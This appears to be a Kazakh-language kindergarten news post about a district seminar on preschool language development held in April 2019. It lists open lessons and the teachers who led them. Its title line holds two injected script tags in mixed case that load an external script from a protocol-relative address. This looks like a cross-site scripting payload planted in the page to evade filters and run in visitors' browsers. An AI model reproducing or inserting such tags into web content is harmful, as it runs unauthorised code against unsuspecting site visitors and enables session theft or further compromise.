Аудандық семинар<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
30.04.2019
2019 ж. 25 сәуірде «Жарқын Ай» МКҚК балабақшасында «Заманауи технология бойынша мектеп жасына дейінгі балалардың тілін дамыту жолдары» тақырыбында аудандық семинар өтті.
Семинарда II кіші «Радуга» орыс тобында «Путешествие с колобком по сказке» В.Г.Абрамушина, ал II кіші қазақ «Дана» тобында Г.К. Пакеева «Шұбар тауық» ашық сабақтар өткізді. «Жұлдыз» ересек тобының тәрбиешісі Д.А.Ибраева «Математика еліне саяхат», ортаңғы «Солнышко» тобының тәрбиешісі А.К. Альмаганбетова ағылшын пәні мұғалімімен кіріктірілген ашық сабақтар ұйымдастырды. А.Ж.Илюбаева музыкалық жетекші мен Т.А. Козина хореограф жетекшісі ортаңғы «Солнышко» тобымен «В стране Радости» ашық сабақ өткізді. Сонымен қатар Приречный ауылының «Бота» балабақшасының тәрбиешісі II кіші «Дана» тобында «Ормандағы қызықтар» атты ашық сабақ өткізді. Ересек «Жұлдыз» тобында «Гүл жамылған дала» сурет пәнінің мұғалімі Б.К.Испаева ашық сабақ өткізді.